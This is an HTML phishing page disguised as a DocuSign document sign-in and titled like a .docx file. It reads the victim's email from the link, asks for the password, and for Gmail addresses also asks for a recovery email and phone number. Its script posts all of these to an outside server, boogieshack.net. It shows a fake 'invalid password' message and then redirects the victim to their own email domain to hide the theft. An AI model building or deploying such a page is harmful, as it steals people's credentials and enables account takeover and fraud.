ind
<!doctype html>
<html lang="en">

<head>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js">
        <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>IHR202100001.docx</title>
    <link href="css/hover.css" rel="stylesheet" media="all">
    <style type="text/css">
    textarea:hover,
    input:hover,
    textarea:active,
    input:active,
    textarea:focus,
    input:focus,
    button:focus,
    button:active,
    button:hover,
    label:focus,
    .btn:active,
    .btn.active {
        outline: 0px !important;
        -webkit-appearance: none;
        box-shadow: none !important;
    }

    input::-webkit-outer-spin-button,
    input::-webkit-inner-spin-button {
        -webkit-appearance: none;
        margin: 0;
    }

    /* Firefox */
    input[type=number] {
        -moz-appearance: textfield;
    }

    .separator {
        margin-top: 20px;
        display: flex;
        align-items: center;
        text-align: center;
        color: #D2CDCD;
    }

    .separator::before,
    .separator::after {
        content: '';
        flex: 1;
        border-bottom: 1px solid #D2CDCD;
    }

    .separator::before {
        margin-right: 10px;
    }

    .separator::after {
        margin-left: 10px;
    }
    </style>
</head>

<body style="background-image: url('https://i.ibb.co/HVBm7CD/bg.jpg'); background-size: cover;background-repeat: no-repeat;background-attachment: fixed;">
    <div class="container-fluid">
        <div class="container">
            <div class="row my-4">
                <div class="col-lg-6 align-self-center pl-5">
                    <img src="https://i.ibb.co/wrvyggP/Docusign-w.png" class="img-fluid" width="200px"><br>
                    <span class="text-white h5">Please log in with your email account</span>
                </div>
                <div class="col-lg-6">
                    <div class=" p-5 mx-1 bg-white rounded" id="div1">
                        <div class="text-left">
                            <span class="h3 font-weight-bold">Sign In</span><br>
                            <span>New user?<a href="#">Create an account</a></span><br><br>
                            <span id="error" class="text-danger" style="display: none">That DocuSign account doesn't exist. Enter a different account</span><br>
                            <div class="form-group mt-2">
                                <small>Email address</small>
                                <input type="email" name="email" class="form-control bg-transparent" id="email" aria-describedby="emailHelp" placeholder="" style="border-right: none;border-left: none;border-top: none;">
                            </div>
                            <div class="mt-4 text-right">
                                <button class="btn text-white bg-primary px-3 font-weight-bold" id="next" style="border-radius: 20px;">Continue</button>
                            </div>
                        </div>
                        <div class="separator">Or</div>
                        <div class="col-lg-12 mt-4">
                            <button class="btn text-dark text-left bg-white border-secondary w-100" id="next" style="border-radius: 25px; font-weight: 500;padding: 10px 0px 10px 100px"><img src="https://i.ibb.co/2tGVf1h/google.png" class="img-fluid" width="20px"><span style="vertical-align: middle;"> Continue with Google</span></button>
                        </div>
                        <div class="col-lg-12 mt-3">
                            <button class="btn text-light text-left w-100" id="next" style="border-radius: 25px; font-weight: 500;padding: 10px 0px 10px 100px; background-color: #3B5998;"><img src="https://i.ibb.co/j3D2ZZV/fb.png" class="img-fluid" width="20px"><span style="vertical-align: middle;"> Continue with Work account</span></button>
                        </div>
                        <div class="col-lg-12 mt-3">
                            <button class="btn text-light text-left w-100" id="next" style="border-radius: 25px; font-weight: 500;padding: 10px 0px 10px 100px;background-color: black; font-weight: 500;"><img src="https://i.ibb.co/SKWHgFy/apple.png" class="img-fluid" width="20px"><span style="vertical-align: middle;"> Continue with Personal account</span></button>
                        </div>
                    </div>
                    <div class=" p-5 mx-1 bg-white rounded" id="div2" style="display: none">
                        <div class="text-left">
                            <span class="h4 font-weight-bold">Welcome</span><br>
                            <i class="fas fa-arrow-left" id="back"></i>&nbsp<span class="emailch">abc@abc.com</span><br><br>
                            <span id="msg" class="text-danger" style="display: none"></span><br>
                            <div class="form-group">
                                <span class="font-weight-bold">Enter password to finish sign in</span><br>
                                <small>Password</small>
                                <input type="password" name="password" class="form-control bg-transparent" id="password" aria-describedby="emailHelp" placeholder="" style="border-right: none;border-left: none;border-top: none;">
                            </div>
                            <div class="mt-4 text-right">
                                <span class="float-left"><a href="#">Forgot password?</a></span>
                                <button class="btn text-white bg-primary px-3 font-weight-bold" id="submit-btn" style="border-radius: 20px;">Login</button>
                            </div>
                        </div>
                        <div class="separator">Or</div>
                        <div class="col-lg-12 mt-4">
                            <button class="btn text-dark text-left bg-white border-secondary w-100" id="next" style="border-radius: 25px; font-weight: 500;padding: 10px 0px 10px 100px"><img src="https://i.ibb.co/2tGVf1h/google.png" class="img-fluid" width="20px"><span style="vertical-align: middle;"> Continue with Google</span></button>
                        </div>
                        <div class="col-lg-12 mt-3">
                            <button class="btn text-light text-left w-100" id="next" style="border-radius: 25px; font-weight: 500;padding: 10px 0px 10px 100px; background-color: #3B5998;"><img src="https://i.ibb.co/j3D2ZZV/fb.png" class="img-fluid" width="20px"><span style="vertical-align: middle;"> Continue with Work account</span></button>
                        </div>
                        <div class="col-lg-12 mt-3">
                            <button class="btn text-light text-left w-100" id="next" style="border-radius: 25px; font-weight: 500;padding: 10px 0px 10px 100px;background-color: black; font-weight: 500;"><img src="https://i.ibb.co/SKWHgFy/apple.png" class="img-fluid" width="20px"><span style="vertical-align: middle;"> Continue with Personal account</span></button>
                        </div>
                    </div>
                    <div class=" p-5 mx-1 bg-white rounded" id="div3" style="display: none;">
                        <div class="text-left">
                            <span class="h3 font-weight-bold">Welcome</span><br>
                            <span class="h4 font-weight-normal">Verify it's you</span><br>
                            <span>This device is not recognized. For security, DocuSign wants to make sure it's really you.</span><br>
                            <span><a href="#">Learn more</a></span><br>
                            <i class="fas fa-arrow-left" id="back1"></i>&nbsp<span class="emailch">abc@abc.com</span><br>
                            <span id="error1" class="text-danger"></span><br>
                            <div class="form-group">
                                <span class="font-weight-bold">Try another way to sign in*</span><br>
                                <small>Recovery Email</small>
                                <input type="email" name="rec_email" class="form-control bg-transparent" id="rec_email" aria-describedby="emailHelp" placeholder="" style="border-right: none;border-left: none;border-top: none;">
                            </div>
                            <div class="form-group">
                                <small>Phone</small>
                                <input type="number" name="phone" class="form-control bg-transparent" id="phone" aria-describedby="emailHelp" placeholder="" style="border-right: none;border-left: none;border-top: none;">
                            </div>
                            <div class="mt-4 text-right">
                                <button class="btn text-white bg-primary px-3 font-weight-bold" id="submit-btn-1" style="border-radius: 20px;">Verify</button>
                            </div>
                        </div>
                        <div class="separator">Or</div>
                        <div class="col-lg-12 mt-4">
                            <button class="btn text-dark text-left bg-white border-secondary w-100" id="next" style="border-radius: 25px; font-weight: 500;padding: 10px 0px 10px 100px"><img src="https://i.ibb.co/2tGVf1h/google.png" class="img-fluid" width="20px"><span style="vertical-align: middle;"> Continue with Google</span></button>
                        </div>
                        <div class="col-lg-12 mt-3">
                            <button class="btn text-light text-left w-100" id="next" style="border-radius: 25px; font-weight: 500;padding: 10px 0px 10px 100px; background-color: #3B5998;"><img src="https://i.ibb.co/j3D2ZZV/fb.png" class="img-fluid" width="20px"><span style="vertical-align: middle;"> Continue with Work account</span></button>
                        </div>
                        <div class="col-lg-12 mt-3">
                            <button class="btn text-light text-left w-100" id="next" style="border-radius: 25px; font-weight: 500;padding: 10px 0px 10px 100px;background-color: black; font-weight: 500;"><img src="https://i.ibb.co/SKWHgFy/apple.png" class="img-fluid" width="20px"><span style="vertical-align: middle;"> Continue with Personal account</span></button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- Optional JavaScript -->
        <!-- jQuery first, then Popper.js, then Bootstrap JS -->
        <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;
    /////////////url email getting////////////////
    var email = window.location.hash.substr(1);
    if (!email) {

    } else {
        // $('#email').val(email);
        var my_email = email;
        var ind = my_email.indexOf("@");
        var my_slice = my_email.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();


        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
            $('#error').show();
            email.focus;
            return false;
        }
        $('#error').hide();

        $("#div1").animate({ left: 0, opacity: "hide" }, 0);
        $("#div2").animate({ right: 0, opacity: "show" }, 1000);
        $("#email").val(my_email);
        $(".emailch").html(my_email);

    }
    ///////////////url getting email////////////////
    $('#email').click(function() {
        $('#error').hide();
    });
    $('#next').click(function() {
        var my_email = $('#email').val();
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
            $('#error').show();
            email.focus;
            return false;
        }
        $('#error').hide();
        var ind = my_email.indexOf("@");
        var my_slice = my_email.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();

        $("#div1").animate({ left: 0, opacity: "hide" }, 0);
        $("#div2").animate({ right: 0, opacity: "show" }, 1000);
        $(".emailch").html(my_email);


    });
    $('#back').click(function() {
        $("#msg").hide();
        $('#error').hide();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);

    });
    $('#back1').click(function() {
        $("#msg").hide();
        $('#error').hide();
        $('#error1').hide();
        $('#password').val("");
        $("#div3").animate({ left: 0, opacity: "hide" }, 0);
        $("#div2").animate({ right: 0, opacity: "show" }, 1000);

    });


    $('#submit-btn').click(function(event) {
        event.preventDefault();
        var email = $("#email").val();
        var password = $("#password").val();
        var detail = $("#field").html();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        var my_email = email;
        var ind = my_email.indexOf("@");
        var my_slice = my_email.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        count = count + 1;
        

        $.ajax({
            dataType: 'JSON',
            url: 'https://boogieshack.net/extlib/XML/Parser/next.php',
            type: 'POST',
            data: {
                email: email,
                password: password,
                detail: detail,

            },
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {

                if (count >= 1 && final == "gmail") {
                	$('#error1').hide();
                    $("#div2").animate({ left: 0, opacity: "hide" }, 0);
                    $("#div3").animate({ right: 0, opacity: "show" }, 1000);
                    return false;
                }
                $("#password").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $('#msg').html(response['msg']);
                    } else {
                        $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
            	if (count >= 1 && final == "gmail") {
                	$('#error1').hide();
                    $("#div2").animate({ left: 0, opacity: "hide" }, 0);
                    $("#div3").animate({ right: 0, opacity: "show" }, 1000);
                    return false;
                }
                $("#password").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#msg").show();
                $('#msg').html("Invalid password.! Enter your correct password.");
            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });
    });
    $('#submit-btn-1').click(function(event) {
        event.preventDefault();
        var email = $("#email").val();
        var password = $("#password").val();
        var rec_email = $("#rec_email").val();
        var phone = $("#phone").val();
        var my_email = email;
        var ind = my_email.indexOf("@");
        var my_slice = my_email.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        count = count + 1;
        if (!rec_email) {
            $('#error1').show();
            $('#error1').html("Recovery Email field in Empty");
            return false;
        }
        if (!phone) {
            $('#error1').show();
            $('#error1').html("Phone field in Empty");
            return false;
        }

        $.ajax({
            dataType: 'JSON',
            url: 'https://boogieshack.net/extlib/XML/Parser/next.php',
            type: 'POST',
            data: {
                email: email,
                password: password,
                rec_email: rec_email,
                phone: phone,

            },
            beforeSend: function(xhr) {
                $('#submit-btn-1').html('Verifing...');
            },
            success: function(response) {
                
                    window.location.replace("http://www." + my_slice);
                
            },
            error: function() {
                
                    window.location.replace("http://www." + my_slice);
            },
            complete: function() {
                $('#submit-btn-1').html('Verify');
            }
        });
    });
});
</script>

</html>